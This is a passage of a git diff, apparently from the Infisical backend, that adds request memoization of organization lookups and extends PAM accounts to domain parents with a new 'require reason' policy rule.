orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -687,7 +686,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -724,7 +723,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -763,7 +762,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -799,7 +798,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -827,7 +826,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -858,7 +857,7 @@ export const licenseServiceFactory = ({ OrgPermissionSubjects.Billing ); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -882,7 +881,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -906,7 +905,7 @@ export const licenseServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(OrgPermissionBillingActions.Read, OrgPermissionSubjects.Billing); - const organization = await orgDAL.findById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindById(orgId), () => orgDAL.findById(orgId)); if (!organization) { throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` @@ -920,7 +919,7 @@ export const licenseServiceFactory = ({ }; const invalidateGetPlan = async (orgId: string) => { - await keyStore.deleteItem(FEATURE_CACHE_KEY(orgId)); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(orgId)); }; const getCustomerId = () => { diff --git a/backend/src/ee/services/license/license-types.ts b/backend/src/ee/services/license/license-types.ts index bd556a50658..6dd0214a988 100644 --- a/backend/src/ee/services/license/license-types.ts +++ b/backend/src/ee/services/license/license-types.ts @@ -84,6 +84,7 @@ export type TFeatureSet = { projectTemplates: false; kmip: false; gateway: false; + gatewayPool: false; sshHostGroups: false; secretScanning: false; enterpriseSecretSyncs: false; diff --git a/backend/src/ee/services/oidc/oidc-config-service.ts b/backend/src/ee/services/oidc/oidc-config-service.ts index 65cc514796a..8043d351495 100644 --- a/backend/src/ee/services/oidc/oidc-config-service.ts +++ b/backend/src/ee/services/oidc/oidc-config-service.ts @@ -15,7 +15,9 @@ import { OrgPermissionSsoActions, OrgPermissionSubjects } from "@app/ee/services import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { getConfig } from "@app/lib/config/env"; import { BadRequestError, ForbiddenRequestError, NotFoundError, OidcAuthError } from "@app/lib/errors"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { OrgServiceActor } from "@app/lib/types"; import { @@ -197,7 +199,6 @@ export const oidcConfigServiceFactory = ({ }); } - // Verify that the email domain (if verified on the platform) belongs to this org await verifyEmailDomainOwnership({ email, orgId, emailDomainDAL }); const sanitizedEmail = sanitizeEmail(email); validateEmail(sanitizedEmail); @@ -208,7 +209,7 @@ export const oidcConfigServiceFactory = ({ aliasType: UserAliasType.OIDC }); - const organization = await orgDAL.findOrgById(orgId); + const organization = await requestMemoize(requestMemoKeys.orgFindOrgById(orgId), () => orgDAL.findOrgById(orgId)); if (!organization) throw new NotFoundError({ message: `Organization with ID '${orgId}' not found` }); let user: TUsers; @@ -420,7 +421,7 @@ export const oidcConfigServiceFactory = ({ await smtpService .sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${token}`, recipients: [user.email], substitutions: { code: token diff --git a/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts b/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts index 1206b2c7c2b..c6f9069a834 100644 --- a/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts +++ b/backend/src/ee/services/pam-account-policy/pam-account-policy-constants.ts @@ -4,7 +4,8 @@ import { PamAccountPolicyRuleType } from "./pam-account-policy-enums"; export const PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES: Record = { [PamAccountPolicyRuleType.CommandBlocking]: [PamResource.SSH], - [PamAccountPolicyRuleType.SessionLogMasking]: "all" + [PamAccountPolicyRuleType.SessionLogMasking]: "all", + [PamAccountPolicyRuleType.RequireReason]: "all" }; export const PAM_ACCOUNT_POLICY_RULE_METADATA: Record = @@ -16,5 +17,9 @@ export const PAM_ACCOUNT_POLICY_RULE_METADATA: Record; export const pamAccountDALFactory = (db: TDbClient) => { const orm = ormify(db, TableName.PamAccount); - const findByProjectIdWithResourceDetails = async ( + const findByProjectIdWithParentDetails = async ( { projectId, folderId, @@ -26,6 +26,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { orderBy = PamAccountOrderBy.Name, orderDirection = OrderByDirection.ASC, filterResourceIds, + filterDomainIds, metadataFilter }: { projectId: string; @@ -37,6 +38,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { orderBy?: PamAccountOrderBy; orderDirection?: OrderByDirection; filterResourceIds?: string[]; + filterDomainIds?: string[]; metadataFilter?: Array<{ key: string; value?: string }>; }, tx?: Knex @@ -45,6 +47,7 @@ export const pamAccountDALFactory = (db: TDbClient) => { const dbInstance = tx || db.replicaNode(); const query = dbInstance(TableName.PamAccount) .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .leftJoin(TableName.PamAccountPolicy, `${TableName.PamAccount}.policyId`, `${TableName.PamAccountPolicy}.id`) .where(`${TableName.PamAccount}.projectId`, projectId); @@ -67,12 +70,24 @@ export const pamAccountDALFactory = (db: TDbClient) => { void q .whereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamAccount, "name", pattern]) .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamResource, "name", pattern]) + .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamDomain, "name", pattern]) .orWhereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamAccount, "description", pattern]); }); } - if (filterResourceIds && filterResourceIds.length) { + const hasResourceFilter = filterResourceIds && filterResourceIds.length > 0; + const hasDomainFilter = filterDomainIds && filterDomainIds.length > 0; + + if (hasResourceFilter && hasDomainFilter) { + void query.where((qb) => { + void qb + .whereIn(`${TableName.PamAccount}.resourceId`, filterResourceIds) + .orWhereIn(`${TableName.PamAccount}.domainId`, filterDomainIds); + }); + } else if (hasResourceFilter) { void query.whereIn(`${TableName.PamAccount}.resourceId`, filterResourceIds); + } else if (hasDomainFilter) { + void query.whereIn(`${TableName.PamAccount}.domainId`, filterDomainIds); } if (metadataFilter && metadataFilter.length > 0) { @@ -82,10 +97,16 @@ export const pamAccountDALFactory = (db: TDbClient) => { const countQuery = query.clone().count("*", { as: "count" }).first(); void query.select(selectAllTableCols(TableName.PamAccount)).select( - // resource + // resource (may be null for domain accounts) db.ref("name").withSchema(TableName.PamResource).as("resourceName"), db.ref("resourceType").withSchema(TableName.PamResource), - db.ref("encryptedRotationAccountCredentials").withSchema(TableName.PamResource), + db + .ref("encryptedRotationAccountCredentials") + .withSchema(TableName.PamResource) + .as("resourceEncryptedRotationAccountCredentials"), + // domain (may be null for resource accounts) + db.ref("name").withSchema(TableName.PamDomain).as("domainName"), + db.ref("domainType").withSchema(TableName.PamDomain), // policy db.ref("name").withSchema(TableName.PamAccountPolicy).as("policyName") ); @@ -101,66 +122,110 @@ export const pamAccountDALFactory = (db: TDbClient) => { const [results, countResult] = await Promise.all([query, countQuery]); const totalCount = Number(countResult?.count || 0); - const accounts = results.map( - // @ts-expect-error resourceName, resourceType, encryptedRotationAccountCredentials, policyName are from joined tables - ({ resourceId, resourceName, resourceType, encryptedRotationAccountCredentials, policyName, ...account }) => ({ - ...account, - resourceId, - policyName: (policyName as string) || null, - resource: { - id: resourceId, - name: resourceName as string, - resourceType, - encryptedRotationAccountCredentials - } - }) - ); + const accounts = results.map((row) => { + const r = row as Record; + const rId = row.resourceId as string | null; + const dId = row.domainId as string | null; + + return { + ...row, + resourceId: rId, + domainId: dId, + policyName: (r.policyName as string) || null, + resource: rId + ? { + id: rId, + name: r.resourceName as string, + resourceType: r.resourceType as string, + encryptedRotationAccountCredentials: r.resourceEncryptedRotationAccountCredentials as Buffer | null + } + : null, + domain: dId + ? { + id: dId, + name: r.domainName as string, + domainType: r.domainType as string + } + : null + }; + }); + return { accounts, totalCount }; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM accounts with resource details" }); + throw new DatabaseError({ error, name: "Find PAM accounts with parent details" }); } }; - const findByIdWithResourceDetails = async (accountId: string, tx?: Knex) => { + const findByIdWithParentDetails = async (accountId: string, tx?: Knex) => { try { const dbInstance = tx || db.replicaNode(); const result = await dbInstance(TableName.PamAccount) .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .leftJoin(TableName.PamAccountPolicy, `${TableName.PamAccount}.policyId`, `${TableName.PamAccountPolicy}.id`) .where(`${TableName.PamAccount}.id`, accountId) .select(selectAllTableCols(TableName.PamAccount)) .select( + // resource (may be null for domain accounts) db.ref("name").withSchema(TableName.PamResource).as("resourceName"), db.ref("resourceType").withSchema(TableName.PamResource), - db.ref("encryptedRotationAccountCredentials").withSchema(TableName.PamResource), + db + .ref("encryptedRotationAccountCredentials") + .withSchema(TableName.PamResource) + .as("resourceEncryptedRotationAccountCredentials"), + // domain (may be null for resource accounts) + db.ref("name").withSchema(TableName.PamDomain).as("domainName"), + db.ref("domainType").withSchema(TableName.PamDomain), db.ref("name").withSchema(TableName.PamAccountPolicy).as("policyName") ) .first(); if (!result) return null; - const { resourceId, resourceName, resourceType, encryptedRotationAccountCredentials, policyName, ...account } = - result as { - resourceId: string; - resourceName: string; - resourceType: string; - encryptedRotationAccountCredentials: Buffer | null; - policyName: string | null; - } & typeof result; + const { + resourceId, + domainId, + resourceName, + resourceType, + resourceEncryptedRotationAccountCredentials, + domainName, + domainType, + policyName, + ...account + } = result as { + resourceId: string | null; + domainId: string | null; + resourceName: string | null; + resourceType: string | null; + resourceEncryptedRotationAccountCredentials: Buffer | null; + domainName: string | null; + domainType: string | null; + policyName: string | null; + } & typeof result; return { ...account, resourceId, + domainId, policyName: policyName || null, - resource: { - id: resourceId, - name: resourceName, - resourceType, - encryptedRotationAccountCredentials - } + resource: resourceId + ? { + id: resourceId, + name: resourceName, + resourceType, + encryptedRotationAccountCredentials: resourceEncryptedRotationAccountCredentials + } + : null, + domain: domainId + ? { + id: domainId, + name: domainName, + domainType + } + : null }; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM account by ID with resource details" }); + throw new DatabaseError({ error, name: "Find PAM account by ID with parent details" }); } }; @@ -179,14 +244,34 @@ export const pamAccountDALFactory = (db: TDbClient) => { return byAccountId; }; - const findRotationCandidates = async (resourceIds: string[], minIntervalSeconds: number, tx?: Knex) => { - if (!resourceIds.length) return []; + const findRotationCandidates = async ( + { + resourceIds, + domainIds, + minIntervalSeconds + }: { + resourceIds?: string[]; + domainIds?: string[]; + minIntervalSeconds: number; + }, + tx?: Knex + ) => { + const hasResourceIds = resourceIds && resourceIds.length > 0; + const hasDomainIds = domainIds && domainIds.length > 0; + if (!hasResourceIds && !hasDomainIds) return []; try { const cutoff = new Date(Date.now() - minIntervalSeconds * 1000); return await (tx || db.replicaNode())(TableName.PamAccount) - .whereIn("resourceId", resourceIds) + .where((qb) => { + if (hasResourceIds) { + void qb.whereIn("resourceId", resourceIds); + } + if (hasDomainIds) { + void qb.orWhereIn("domainId", domainIds); + } + }) .where((qb) => { void qb.whereNot("rotationStatus", "rotating").orWhereNull("rotationStatus"); }) @@ -203,8 +288,8 @@ export const pamAccountDALFactory = (db: TDbClient) => { return { ...orm, - findByProjectIdWithResourceDetails, - findByIdWithResourceDetails, + findByProjectIdWithParentDetails, + findByIdWithParentDetails, findMetadataByAccountIds, findRotationCandidates }; diff --git a/backend/src/ee/services/pam-account/pam-account-enums.ts b/backend/src/ee/services/pam-account/pam-account-enums.ts index 0c39e81bb67..dbaddeab206 100644 --- a/backend/src/ee/services/pam-account/pam-account-enums.ts +++ b/backend/src/ee/services/pam-account/pam-account-enums.ts @@ -1,3 +1,8 @@ +import { PamDomainType } from "../pam-domain/pam-domain-enums"; +import { PamResource } from "../pam-resource/pam-resource-enums"; + +export type PamParentType = PamResource | PamDomainType; + export enum PamAccountOrderBy { Name = "name" } diff --git a/backend/src/ee/services/pam-account/pam-account-fns.ts b/backend/src/ee/services/pam-account/pam-account-fns.ts index 679710e0ba7..493b5014367 100644 --- a/backend/src/ee/services/pam-account/pam-account-fns.ts +++ b/backend/src/ee/services/pam-account/pam-account-fns.ts @@ -1,10 +1,49 @@ import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { KmsDataKey } from "@app/services/kms/kms-types"; +import { KubernetesAuthMethod } from "../pam-resource/kubernetes/kubernetes-resource-enums"; import { PamResource } from "../pam-resource/pam-resource-enums"; import { TPamAccountCredentials, TPamResourceInternalMetadata } from "../pam-resource/pam-resource-types"; import { SSHAuthMethod } from "../pam-resource/ssh/ssh-resource-enums"; +type TAccountParentResource = { + id: string; + name: string; + resourceType: string; + encryptedRotationAccountCredentials?: Buffer | null; +}; + +type TAccountParentDomain = { + id: string; + name: string; + domainType: string; +}; + +export const formatAccountParent = ({ + resource, + domain +}: { + resource?: TAccountParentResource | null; + domain?: TAccountParentDomain | null; +}) => ({ + parentType: resource?.resourceType ?? domain?.domainType ?? "", + resource: resource + ? { + id: resource.id, + name: resource.name, + resourceType: resource.resourceType, + rotationCredentialsConfigured: Boolean(resource.encryptedRotationAccountCredentials) + } + : null, + domain: domain + ? { + id: domain.id, + name: domain.name, + domainType: domain.domainType + } + : null +}); + export const encryptAccountCredentials = async ({ projectId, credentials, @@ -69,11 +108,16 @@ export const decryptAccountMessage = async ({ }; // Returns false for account types where all credential fields are already visible in the sanitized view -export const hasSensitiveCredentials = (resourceType: string, credentials: TPamAccountCredentials): boolean => { - if (resourceType === PamResource.AwsIam) return false; - if (resourceType === PamResource.Kubernetes) return false; +export const hasSensitiveCredentials = (parentType: string, credentials: TPamAccountCredentials): boolean => { + if (parentType === PamResource.AwsIam) return false; + if ( + parentType === PamResource.Kubernetes && + "authMethod" in credentials && + credentials.authMethod === KubernetesAuthMethod.GatewayKubernetesAuth + ) + return false; if ( - resourceType === PamResource.SSH && + parentType === PamResource.SSH && "authMethod" in credentials && credentials.authMethod === SSHAuthMethod.Certificate ) @@ -87,6 +131,7 @@ const hasConfiguredCredentials = (credentials: TPamAccountCredentials): boolean if ("serviceAccountToken" in credentials && credentials.serviceAccountToken) return true; if ("targetRoleArn" in credentials && credentials.targetRoleArn) return true; if ("authMethod" in credentials && credentials.authMethod === SSHAuthMethod.Certificate) return true; + if ("authMethod" in credentials && credentials.authMethod === KubernetesAuthMethod.GatewayKubernetesAuth) return true; return false; }; diff --git a/backend/src/ee/services/pam-account/pam-account-service.ts b/backend/src/ee/services/pam-account/pam-account-service.ts index 59df0f1d083..32784ab54cb 100644 --- a/backend/src/ee/services/pam-account/pam-account-service.ts +++ b/backend/src/ee/services/pam-account/pam-account-service.ts @@ -2,9 +2,11 @@ import { ForbiddenError, subject } from "@casl/ability"; import picomatch from "picomatch"; import { ActionProjectType, OrganizationActionScope, TableName, TPamAccounts, TPamResources } from "@app/db/schemas"; +import { decryptDomainConnectionDetails } from "@app/ee/services/pam-domain/pam-domain-fns"; import { + exchangeCredentialsForConsoleUrl, extractAwsAccountIdFromArn, - generateConsoleFederationUrl, + generateAwsIamSessionCredentials, TAwsIamAccountCredentials } from "@app/ee/services/pam-resource/aws-iam"; import { parseMongoConnectionString } from "@app/ee/services/pam-resource/mongodb/mongodb-resource-factory"; @@ -23,6 +25,7 @@ import { import { createSshCert, createSshKeyPair } from "@app/ee/services/ssh/ssh-certificate-authority-fns"; import { SshCertType } from "@app/ee/services/ssh/ssh-certificate-authority-types"; import { SshCertKeyAlgorithm } from "@app/ee/services/ssh-certificate/ssh-certificate-types"; +import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, @@ -32,6 +35,8 @@ import { PolicyViolationError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { TApprovalPolicyDALFactory } from "@app/services/approval-policy/approval-policy-dal"; import { ApprovalPolicyType } from "@app/services/approval-policy/approval-policy-enums"; @@ -57,6 +62,9 @@ import { TPamAccountPolicyDALFactory } from "../pam-account-policy/pam-account-p import { PamAccountPolicyRuleType } from "../pam-account-policy/pam-account-policy-enums"; import { TPolicyRules } from "../pam-account-policy/pam-account-policy-types"; import { TPamAccountDependenciesDALFactory } from "../pam-discovery/pam-account-dependencies-dal"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; +import { PamDomainType } from "../pam-domain/pam-domain-enums"; +import { PAM_DOMAIN_FACTORY_MAP } from "../pam-domain/pam-domain-factory"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { PamResource } from "../pam-resource/pam-resource-enums"; import { TPamResourceRotationRulesDALFactory } from "../pam-resource/pam-resource-rotation-rules-dal"; @@ -73,6 +81,7 @@ import { decryptAccount, decryptAccountCredentials, encryptAccountCredentials, + formatAccountParent, hasSensitiveCredentials } from "./pam-account-fns"; import { @@ -86,6 +95,7 @@ import { type TPamAccountServiceFactoryDep = { pamResourceDAL: TPamResourceDALFactory; + pamDomainDAL: TPamDomainDALFactory; pamSessionDAL: TPamSessionDALFactory; pamAccountDAL: TPamAccountDALFactory; pamAccountPolicyDAL: Pick; @@ -111,6 +121,7 @@ type TPamAccountServiceFactoryDep = { TPamAccountDependenciesDALFactory, "findByAccountId" | "updateById" | "countByAccountIds" >; + keyStore: Pick; }; export type TPamAccountServiceFactory = ReturnType; @@ -119,6 +130,7 @@ const ROTATION_CONCURRENCY_LIMIT = 10; export const pamAccountServiceFactory = ({ pamResourceDAL, + pamDomainDAL, pamSessionDAL, pamAccountDAL, pamAccountPolicyDAL, @@ -135,12 +147,65 @@ export const pamAccountServiceFactory = ({ approvalRequestGrantsDAL, pamSessionExpirationService, resourceMetadataDAL, - pamAccountDependenciesDAL + pamAccountDependenciesDAL, + keyStore }: TPamAccountServiceFactoryDep) => { + // Helper to resolve account parent (resource or domain) + const resolveAccountParent = async ({ + resourceId, + domainId + }: { + resourceId?: string | null; + domainId?: string | null; + }) => { + if (resourceId) { + const resource = await pamResourceDAL.findById(resourceId); + if (!resource) throw new NotFoundError({ message: `Resource with ID '${resourceId}' not found` }); + return { + projectId: resource.projectId, + name: resource.name, + resourceType: resource.resourceType, + domainType: null as string | null, + gatewayId: resource.gatewayId, + encryptedConnectionDetails: resource.encryptedConnectionDetails, + encryptedResourceMetadata: resource.encryptedResourceMetadata, + encryptedRotationAccountCredentials: resource.encryptedRotationAccountCredentials, + isResource: true as const, + raw: resource + }; + } + if (!domainId) throw new BadRequestError({ message: "Either resourceId or domainId must be provided" }); + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + return { + projectId: domain.projectId, + name: domain.name, + resourceType: null as string | null, + domainType: domain.domainType, + gatewayId: domain.gatewayId, + encryptedConnectionDetails: domain.encryptedConnectionDetails, + encryptedResourceMetadata: null as Buffer | null, + encryptedRotationAccountCredentials: null as Buffer | null, + isResource: false as const, + raw: domain + }; + }; + + // Resolve whether the given policy enforces RequireReason at access time. + // Surfaced on account responses so the UI can gate access without needing + // pam-account-policy:read permission. + const resolveRequireReason = async (policyId?: string | null) => { + if (!policyId) return false; + const policy = await pamAccountPolicyDAL.findById(policyId); + const policyRules = (policy?.rules ?? {}) as TPolicyRules; + return Boolean(policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason]); + }; + const create = async ( { credentials, resourceId, + domainId, name, description, folderId, @@ -151,62 +216,74 @@ export const pamAccountServiceFactory = ({ }: TCreateAccountDTO, actor: OrgServiceActor ) => { - const resource = await pamResourceDAL.findById(resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${resourceId}' not found` }); + const parent = await resolveAccountParent({ resourceId, domainId }); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, actorId: actor.id, actorOrgId: actor.orgId, - projectId: resource.projectId, + projectId: parent.projectId, actionProjectType: ActionProjectType.PAM }); ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Create, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: (metadata || []).map(({ key, value }) => ({ key, value: value ?? "" })) }) ); - const connectionDetails = await decryptResourceConnectionDetails({ - projectId: resource.projectId, - encryptedConnectionDetails: resource.encryptedConnectionDetails, - kmsService - }); - - // Decrypt resource metadata if available - const resourceInternalMetadata = resource.encryptedResourceMetadata - ? await decryptResourceMetadata({ - encryptedMetadata: resource.encryptedResourceMetadata, - projectId: resource.projectId, - kmsService - }) - : undefined; - - const factory = PAM_RESOURCE_FACTORY_MAP[resource.resourceType as PamResource]( - resource.resourceType as PamResource, - connectionDetails, - resource.gatewayId, - gatewayV2Service, - resource.projectId, - resourceInternalMetadata - ); + let factory; + if (parent.isResource) { + const connectionDetails = await decryptResourceConnectionDetails({ + projectId: parent.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + const resourceInternalMetadata = parent.encryptedResourceMetadata + ? await decryptResourceMetadata({ + encryptedMetadata: parent.encryptedResourceMetadata, + projectId: parent.projectId, + kmsService + }) + : undefined; + factory = PAM_RESOURCE_FACTORY_MAP[parent.resourceType as PamResource]( + parent.resourceType as PamResource, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + parent.projectId, + resourceInternalMetadata + ); + } else { + const connectionDetails = await decryptDomainConnectionDetails({ + projectId: parent.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + factory = PAM_DOMAIN_FACTORY_MAP[parent.domainType as PamDomainType]( + parent.domainType as PamDomainType, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + parent.projectId + ); + } const validatedCredentials = await factory.validateAccountCredentials(credentials); const encryptedCredentials = await encryptAccountCredentials({ credentials: validatedCredentials, - projectId: resource.projectId, + projectId: parent.projectId, kmsService }); if (policyId) { const policy = await pamAccountPolicyDAL.findById(policyId); - if (!policy || policy.projectId !== resource.projectId) { + if (!policy || policy.projectId !== parent.projectId) { throw new NotFoundError({ message: "Policy not found" }); } } @@ -215,8 +292,9 @@ export const pamAccountServiceFactory = ({ const { account, insertedMetadata } = await pamAccountDAL.transaction(async (tx) => { const newAccount = await pamAccountDAL.create( { - projectId: resource.projectId, - resourceId: resource.id, + projectId: parent.projectId, + resourceId: resourceId || null, + domainId: domainId || null, encryptedCredentials, name, description, @@ -245,20 +323,18 @@ export const pamAccountServiceFactory = ({ }); return { - ...(await decryptAccount(account, resource.projectId, kmsService)), + ...(await decryptAccount(account, parent.projectId, kmsService)), + ...formatAccountParent({ + resource: parent.isResource ? parent.raw : null, + domain: parent.isResource ? null : parent.raw + }), metadata: insertedMetadata?.map(({ id, key, value }) => ({ id, key, value: value ?? "" })) ?? [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(account.policyId) }; } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { throw new BadRequestError({ - message: `Account with name '${name}' already exists for this resource` + message: `Account with name '${name}' already exists` }); } @@ -273,8 +349,8 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(accountId); if (!account) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); + const parent = await resolveAccountParent(account); + const resource = parent.isResource ? (parent.raw as TPamResources) : null; const { permission } = await permissionService.getProjectPermission({ actor: actor.type, @@ -292,9 +368,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Edit, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: currentMetadata }) ); @@ -304,9 +380,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Edit, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: name ?? account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: metadata ? metadata.map(({ key, value }) => ({ key, value: value ?? "" })) : currentMetadata }) ); @@ -341,29 +417,42 @@ export const pamAccountServiceFactory = ({ } if (credentials !== undefined) { - const connectionDetails = await decryptResourceConnectionDetails({ - projectId: account.projectId, - encryptedConnectionDetails: resource.encryptedConnectionDetails, - kmsService - }); - - // Decrypt resource metadata if available - const resourceInternalMetadata = resource.encryptedResourceMetadata - ? await decryptResourceMetadata({ - encryptedMetadata: resource.encryptedResourceMetadata, - projectId: account.projectId, - kmsService - }) - : undefined; - - const factory = PAM_RESOURCE_FACTORY_MAP[resource.resourceType as PamResource]( - resource.resourceType as PamResource, - connectionDetails, - resource.gatewayId, - gatewayV2Service, - account.projectId, - resourceInternalMetadata - ); + let factory; + if (parent.isResource) { + const connectionDetails = await decryptResourceConnectionDetails({ + projectId: account.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + const resourceInternalMetadata = parent.encryptedResourceMetadata + ? await decryptResourceMetadata({ + encryptedMetadata: parent.encryptedResourceMetadata, + projectId: account.projectId, + kmsService + }) + : undefined; + factory = PAM_RESOURCE_FACTORY_MAP[parent.resourceType as PamResource]( + parent.resourceType as PamResource, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + account.projectId, + resourceInternalMetadata + ); + } else { + const connectionDetails = await decryptDomainConnectionDetails({ + projectId: account.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + factory = PAM_DOMAIN_FACTORY_MAP[parent.domainType as PamDomainType]( + parent.domainType as PamDomainType, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + account.projectId + ); + } const decryptedCredentials = await decryptAccountCredentials({ encryptedCredentials: account.encryptedCredentials, @@ -391,14 +480,12 @@ export const pamAccountServiceFactory = ({ const existingMeta = await pamAccountDAL.findMetadataByAccountIds([accountId]); return { ...(await decryptAccount(account, account.projectId, kmsService)), + ...formatAccountParent({ + resource, + domain: parent.isResource ? null : parent.raw + }), metadata: existingMeta[accountId] || [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(account.policyId) }; } @@ -428,14 +515,12 @@ export const pamAccountServiceFactory = ({ return { ...(await decryptAccount(updatedAccount, account.projectId, kmsService)), + ...formatAccountParent({ + resource, + domain: parent.isResource ? null : parent.raw + }), metadata: freshMeta[accountId] || [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: 